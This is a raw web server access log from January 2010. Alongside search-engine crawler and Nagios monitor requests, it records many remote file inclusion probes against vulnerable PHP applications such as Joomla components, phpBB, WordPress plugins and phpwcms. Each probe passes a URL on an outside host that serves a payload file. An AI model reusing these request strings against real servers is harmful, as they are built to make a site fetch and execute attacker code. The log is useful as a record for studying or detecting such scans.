173.212.202.130 - - [17/Jan/2010:02:16:13 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://pottlot.bshellz.net/c123.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:02:16:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
173.212.202.130 - - [17/Jan/2010:02:16:31 -0500] "GET /logs/access_log.Q109081500//claroline/phpbb/page_tail.php?includePath=http://pottlot.bshellz.net/c123.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:15:18 -0500] "GET /logs/error_log.Q109061700 HTTP/1.0" 200 2209496 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:02:16:36 -0500] "GET /logs/error_log.Q109122200 HTTP/1.0" 200 3474460 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:02:15:38 -0500] "GET /logs/access_log.Q109122700 HTTP/1.0" 200 2514706 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.212.202.130 - - [17/Jan/2010:02:17:00 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://pottlot.bshellz.net/c123.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
173.212.202.130 - - [17/Jan/2010:02:17:00 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://pottlot.bshellz.net/c123.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:17:12 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:17:12 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:17:13 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:17:17 -0500] "GET /logs/access_log.Q109101500//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:17:34 -0500] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:16:39 -0500] "GET /logs/access_log.Q109081500 HTTP/1.0" 200 3060423 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.212.202.130 - - [17/Jan/2010:02:17:49 -0500] "GET /logs/access_log.Q109081500//claroline/phpbb/page_tail.php?includePath=http://pottlot.bshellz.net/c123.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.68.53.167 - - [17/Jan/2010:02:18:15 -0500] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.68.53.167 - - [17/Jan/2010:02:18:15 -0500] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.68.53.167 - - [17/Jan/2010:02:18:16 -0500] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:18:16 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:18:16 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:18:16 -0500] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.68.53.167 - - [17/Jan/2010:02:18:17 -0500] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.68.53.167 - - [17/Jan/2010:02:18:17 -0500] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
77.68.53.167 - - [17/Jan/2010:02:18:17 -0500] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:18:18 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:18:18 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:18:18 -0500] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:18:20 -0500] "GET /logs/error_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:17:43 -0500] "GET /logs/error_log.Q109061700 HTTP/1.0" 200 2209496 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.34.111.74 - - [17/Jan/2010:02:18:22 -0500] "GET /logs/error_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:18:39 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:18:39 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:18:39 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:18:47 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:18:48 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:18:48 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:18:59 -0500] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:16:57 -0500] "GET /logs/access_log.Q109102000 HTTP/1.0" 200 6621560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.99.120.74 - - [17/Jan/2010:02:19:05 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:19:05 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:19:09 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:19:10 -0500] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:18:24 -0500] "GET /logs/error_log.Q109122200 HTTP/1.0" 200 3474460 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:02:19:38 -0500] "GET /logs/error_log.Q109121600 HTTP/1.0" 200 15995996 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:02:19:38 -0500] "GET /logs/error_log.Q109070800 HTTP/1.0" 200 2844195 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.99.120.74 - - [17/Jan/2010:02:19:41 -0500] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:19:39 -0500] "GET /logs/error_log.Q109121400 HTTP/1.0" 200 2376646 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.68.53.167 - - [17/Jan/2010:02:19:51 -0500] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.68.53.167 - - [17/Jan/2010:02:19:51 -0500] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:19:03 -0500] "GET /logs/error_log.Q110010300 HTTP/1.0" 200 2626354 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.103.72.130 - - [17/Jan/2010:02:19:54 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.103.72.130 - - [17/Jan/2010:02:19:54 -0500] "GET /logs/access_log.Q109070400//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.103.72.130 - - [17/Jan/2010:02:19:55 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:20:09 -0500] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:20:13 -0500] "GET /logs/error_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:02:17:38 -0500] "GET /logs/access_log.Q109102600 HTTP/1.1" 200 7284585 "-" "Yandex/1.01.001 (compatible; Win16; I)"
64.34.111.74 - - [17/Jan/2010:02:20:20 -0500] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:20:25 -0500] "GET /logs/error_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:20:27 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:20:27 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:20:27 -0500] "GET /logs/error_log.Q109092500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:20:33 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:20:33 -0500] "GET /logs/access_log.Q109092500//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:20:33 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
94.125.182.24 - - [17/Jan/2010:02:20:34 -0500] "GET /logs/error_log.Q109060200/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.813"
94.125.182.24 - - [17/Jan/2010:02:20:35 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.813"
188.93.208.12 - - [17/Jan/2010:02:20:38 -0500] "GET /logs/access_log.Q109092500//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:20:38 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:20:38 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:19:54 -0500] "GET /logs/error_log.Q109070800 HTTP/1.0" 200 2844195 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.125.182.24 - - [17/Jan/2010:02:20:50 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
94.125.182.24 - - [17/Jan/2010:02:20:50 -0500] "GET /logs/access_log.Q109080500/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.813"
69.16.230.82 - - [17/Jan/2010:02:21:03 -0500] "GET /logs/access_log.Q109092000//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:21:09 -0500] "GET /logs/access_log.Q109092000//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:20:45 -0500] "GET /logs/error_log.Q109121400 HTTP/1.0" 200 2376646 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/Jan/2010:02:21:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.175.5.130 - - [17/Jan/2010:02:21:41 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:21:41 -0500] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:21:53 -0500] "GET /logs/error_log.Q109092700//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:22:16 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:22:16 -0500] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:22:39 -0500] "GET /logs/access_log.Q109092400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:22:52 -0500] "GET /logs/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:22:52 -0500] "GET /index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:22:52 -0500] "GET /logs/error_log.Q109100300/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:19:44 -0500] "GET /logs/error_log.Q109121600 HTTP/1.0" 200 15995996 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:02:22:43 -0500] "GET /logs/access_log.Q109080700 HTTP/1.0" 200 3796760 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.172.33.230 - - [17/Jan/2010:02:23:37 -0500] "GET /logs/error_log.Q109100300%20%20/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:23:37 -0500] "GET /logs/error_log.Q109071900%20%20/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.7.173.20 - - [17/Jan/2010:02:24:08 -0500] "GET /logs/index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:24:09 -0500] "GET /logs/access_log.Q109070700%20%20/!alls%20index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.7.173.20 - - [17/Jan/2010:02:24:09 -0500] "GET /index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:24:11 -0500] "GET /logs/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:24:11 -0500] "GET /logs/error_log.Q109100300/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:24:11 -0500] "GET /index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:24:12 -0500] "GET /logs/index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:24:12 -0500] "GET /index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:24:24 -0500] "GET /logs/access_log.Q109060300%20%20/!alls%20index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.79.246.80 - - [17/Jan/2010:02:25:03 -0500] "GET /index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.79.246.80 - - [17/Jan/2010:02:25:03 -0500] "GET /logs/index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:25:17 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:25:17 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:25:22 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:25:25 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:25:26 -0500] "GET /logs/access_log.Q109102700//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:25:28 -0500] "GET //skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:25:28 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:25:46 -0500] "GET /logs/access_log.Q109101500/index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.79.246.80 - - [17/Jan/2010:02:25:50 -0500] "GET /logs/access_log.Q109101500/index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:25:57 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:25:59 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:26:01 -0500] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:26:01 -0500] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:26:05 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:26:08 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:26:10 -0500] "GET /logs/access_log.Q109101500/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.7.173.20 - - [17/Jan/2010:02:26:15 -0500] "GET /index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.7.173.20 - - [17/Jan/2010:02:26:15 -0500] "GET /logs/index2.php?x=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:02:25:37 -0500] "GET /logs/access_log.Q109123000 HTTP/1.0" 200 4044958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.118.94 - - [17/Jan/2010:02:26:28 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:26:38 -0500] "GET //skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:26:38 -0500] "GET /logs/access_log.Q109102700%20%20//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:26:40 -0500] "GET /logs/access_log.Q109120300//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:02:26:40 -0500] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:26:43 -0500] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:26:44 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.74.98.18 - - [17/Jan/2010:02:26:45 -0500] "GET /logs/error_log.Q109082000////?_SERVER[DOCUMENT_ROOT]=http://datanet.wonkwang.ac.kr//bbs//skin/zero_vote/x1.gif?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.74.98.18 - - [17/Jan/2010:02:26:45 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://datanet.wonkwang.ac.kr//bbs//skin/zero_vote/x1.gif?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
